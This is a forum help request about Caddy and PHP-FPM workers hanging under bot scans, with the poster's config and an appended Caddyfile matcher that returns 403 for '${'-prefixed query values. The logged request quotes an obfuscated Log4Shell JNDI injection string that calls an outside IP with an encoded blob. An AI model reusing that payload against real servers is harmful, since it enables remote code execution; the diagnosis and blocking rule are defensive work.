1. The problem I’m having:
We are being spammed by bots looking for vulnerabilities, but unfortunately this is creating PHP processes that remain in a “Getting Connection Information” state and hang. This then rapidly fills the available PHP processes and the whole lot just stops responding to web requests because none of the processes ever complete.
We can see that the main identifier is that a URL is hit with a massive URL parameter starting with something like ?cx=$7B
…
Is there a method to just have Caddy drop anything that looks like that?
2. Error messages and/or full log output:
{"level":"info","ts":1687268912.911088,"logger":"http.log.access.log5","msg":"handled request","request":{"remote_ip":"146.70.45.221","remote_port":"25734","proto":"HTTP/1.1","method":"GET","host":"scotland.redacted.com","uri":"/discover/food-drink?cx=$%7B$%7B:-j%7D$%7B:-n%7D$%7B:-d%7D$%7B:-i%7D:$%7B:-l%7D$%7B:-d%7D$%7B:-a%7D$%7B:-p%7D://143.198.244.73:80/dn=gAAAAABkka4tkNra3aYQj1voDBSasZUdPlP6laGl9fXtWj-3x1wwJkzOzdjX8LOeLLxIr6DLHtL8uIK9brYy6mlxkoS8RB_DLoySmeQSWu2Uvfxdey5KIB5bYbSJ2SNAPfr9ofAH8aSQ5FSI-kH-8ypmUTn0AU2M0l8aU0FpZtGbNpli8f_m2HevItxT9RBZBdUGBD7RfQ4SgkAq-DEgt1HFlhTHuxDH9LTQXSf5zXXmYXKJpC0c_akouddu131kV-kyBjU_XoS8KORKPpFmHmc4uFiUvx69dqOAjKPsrdueZFYKe6HgshQbGpwIC0yckqMW1fKlgzZ6kkWoM3xJXVQLXghxd5gvUUGa7kgZmrV5T6q8Tn3psbzoB6dF5pGzs8V6bPuofNuvn_Z6fpQCs9kIidBVxdJIzMhvBZAG1MfjCguwHAThKHuZDjjaw7DPrtqnW1j1VR6C2K47jK-mISxaGTAFIUh1gY_c1Gk2aCCfNk4nOE22PiL2FrnCF9IdCmaLDu3DJbeKvK4kmg6engx1OOrg9_bzl0xGjtAAhnJDGFl3TppwV9pK8agggQnAD6yhJfjlQd-rNZMSSrx_LDZg4nweV82XTj3O2I2jYaGCDA8plsnbzZH1bKk7JhkLneFxww1sThNHoEKVeb9tNaonahkegQK02r5gbgA6JUrQjVpfI1HgaXhRiCy6Sadm4dhJYw-ZXvCEYJTLrv9kloelNdftwdLu5qSXb1IC5HqMaEmKUVFJ47XaeZsd9xS1byGzmk2X3h1VMb0A-gyhQQXF3u3h52DkcLBEPqOR3qmKBJII9Lqwpruwg0qqFh-mYR6XDtSGMsS5v_C5B-wYijeWCiQyaIX5ND5Q18OiNDExskkrmxJl-WMO4SNcBS2C6yYsEMukEbpzhCmC0LcRVTHCc2uAoeYSEPhITMWb4Y01SvkhWAsHqEoXXHaHRAExcmtX1I5Hf8NJapJKmw5wFXIu0c5Gqs0FcHgwNtOIucmRIzrfgoEC3FOZlAbuUEGUxWMWODPpxDdXLzrPV5ZW2mxwRrGyGsWZbBBuIYCg0coXqJMMZzLWzT3b0vxLPSsDjVISbBZH19cbnzCtHqBT6p6bI9GEBTyX5sLomjC9Os_RSfXwoxKinFJyK0OJ2kerD1CK80qR98tIqkYAJKwx3hicjUhOt4G95JXBoBT6-rrxTX2iIb7v9SwLRL51lSUhi30zHGR55We_Y-NEOWIutNH5WJ-anv5jCK-jkPLrcPhgLVYvcx7FIdDtmqabKaSFk_LHEFDH0yZUFmWHcJuhoossVMaTPa3901zmbZGbg6MJDd6IdqPAthk9Sg0CQ0OR_QXms984kxOv3mApLd4jk4efdcg4u7wGdq9ydk5ws0eGz9NiTWEEpe4-np8BZVnqm8GiKf3NbZmRuqcjxmeuhwT0tvNlB2nIcULdWLBS34raHKoXB7mDz3txtmmUsAt6J2BMLBJhNpj0Y2Hzt4uoNo5BuwVnPQ4J7mjumhgs21A8t0KzJpzph1h4-sJMC5Yk2iwOwaa6uzITNGaG2qFKesxnq7VAlAfhULbm0HmQESjEsJC1Xx9fk9T89HWehWQWZNTNytQosoAL%7D","headers":{"User-Agent":["python-requests/2.31.0"],"Accept-Encoding":["gzip, deflate"],"Accept":["*/*"],"Connection":["keep-alive"]},"tls":{"resumed":false,"version":772,"cipher_suite":4865,"proto":"http/1.1","server_name":"scotland.redacted.com"}},"user_id":"","duration":2.103405375,"size":10138,"status":200,"resp_headers":{"Set-Cookie":[],"Pragma":["no-cache"],"X-Robots-Tag":["all"],"Server":["Caddy"],"Alt-Svc":["h3=\":443\"; ma=2592000"],"Expires":["Thu, 19 Nov 1981 08:52:00 GMT"],"Cache-Control":["no-store, no-cache, must-revalidate"],"Content-Type":["text/html; charset=UTF-8"],"Referrer-Policy":["no-referrer-when-downgrade"],"Content-Encoding":["gzip"],"Vary":["Accept-Encoding"],"Link":["<https://scotland.redacted.com/discover/food-drink>; rel='canonical'"],"X-Powered-By":["Craft CMS"]}}
3. Caddy version:
v2.6.4 h1:2hwYqiRwk1tf3VruhMpLcYTg+11fCdr8S3jhNAdnPy8=
4. How I installed and ran Caddy:
n/a
a. System environment:
Ubuntu 22.04 LTS
b. Command:
n/a
c. Service/unit/compose file:
n/a
d. My complete Caddy config:
redacted.com,
scotland.redacted.com,
north.redacted.com,
south.redacted.com {
    root * /websites/redacted/web
    encode gzip zstd
    log {
        output file /websites/_logs/redacted.log
    }
    php_fastcgi unix//run/php/php8.1-fpm.sock
    file_server
}
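One way to have Caddy reject these probes before they reach PHP-FPM, shown as an added example rather than something from the original post: a named request matcher (the name `@jndi_probe` is an assumption) using Caddy's `expression` matcher on the decoded `cx` query value, which for the logged request begins with `${`. It assumes Caddy v2.6.4 as stated in the post, and uses the `respond` directive, which Caddy orders ahead of `php_fastcgi`, so matched requests get a 403 and never spawn a PHP process.

```caddyfile
redacted.com,
scotland.redacted.com,
north.redacted.com,
south.redacted.com {
    root * /websites/redacted/web
    encode gzip zstd

    # Hypothetical matcher name. {query.cx} is the URL-decoded value of the
    # ?cx= parameter (empty string when absent, so startsWith is false).
    # The logged probe decodes to "${${:-j}${:-n}...", i.e. it starts with "${".
    @jndi_probe {
        expression `{query.cx}.startsWith("${")`
    }

    # Short-circuit matched requests with a 403 and close the connection.
    # respond is ordered before php_fastcgi in Caddy's directive order,
    # so PHP-FPM never sees them and no worker is tied up.
    respond @jndi_probe 403 {
        close
    }

    log {
        output file /websites/_logs/redacted.log
    }
    php_fastcgi unix//run/php/php8.1-fpm.sock
    file_server
}
```

The match is on the decoded value, so it is indifferent to whether the bot sends `${` literally or as `$%7B`; widening it to every parameter name (rather than just `cx`) would need a check on the raw `{http.request.uri.query}` string instead.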